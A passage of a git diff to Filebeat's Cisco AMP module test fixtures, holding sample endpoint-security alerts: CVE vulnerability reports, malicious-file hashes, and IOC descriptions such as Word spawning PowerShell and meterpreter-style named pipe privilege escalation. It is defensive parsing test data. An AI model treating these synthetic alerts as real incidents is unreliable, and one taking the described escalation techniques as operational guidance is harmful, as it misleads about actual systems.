"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 474861000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132474871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 59541, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384389977, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:27.000Z", + "file.hash.sha256": "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 61194, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, + { + "cve": "CVE-2018-0772", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193384371995, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T05:02:26.000Z", + "file.hash.sha256": "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4", + "file.name": "mshtml.dll", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 62768, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:32:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2017-0106", + "CVE-2017-11774", + "CVE-2017-8506", + "CVE-2017-8507", + "CVE-2017-8571", + "CVE-2017-8663", + "CVE-2018-0791" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2017-0106", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106", + "version": "2016" + }, + { + "cve": "CVE-2017-11774", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774" + }, + { + "cve": "CVE-2017-8506", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506" + }, + { + "cve": "CVE-2017-8507", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507" + }, + { + "cve": "CVE-2017-8571", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571" + }, + { + "cve": "CVE-2017-8663", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663" + }, + { + "cve": "CVE-2018-0791", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15193366641599, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2020-12-25T04:32:53.000Z", + "file.hash.sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc", + "file.name": "OUTLOOK.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 64342, + "process.hash.sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243", + "related.hash": [ + "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:22:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 878000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6525498672153625000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 66455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:07:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696715, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.clean": true, + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.scan.malicious_detections": 0, + "cisco.amp.scan.scanned_files": 2872, + "cisco.amp.scan.scanned_paths": 0, + "cisco.amp.scan.scanned_processes": 49, + "cisco.amp.timestamp_nanoseconds": 928000000, + "event.action": "Scan Completed, No Detections", + "event.dataset": "cisco.amp", + "event.id": 6525494703603843000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 67379, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T04:06:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 554696714, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.scan.description": "Flash Scan", + "cisco.amp.timestamp_nanoseconds": 537000000, + "event.action": "Scan Started", + "event.dataset": "cisco.amp", + "event.id": 6525494527510184000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 68455, + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log index ed37c533eac..ae6c21d78ff 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log @@ -10,14 +10,6 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546488","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":274000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670861046546487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670856751579000,"timestamp":1610706336,"timestamp_nanoseconds":880000000,"date":"2021-01-15T10:25:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670856751579190","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 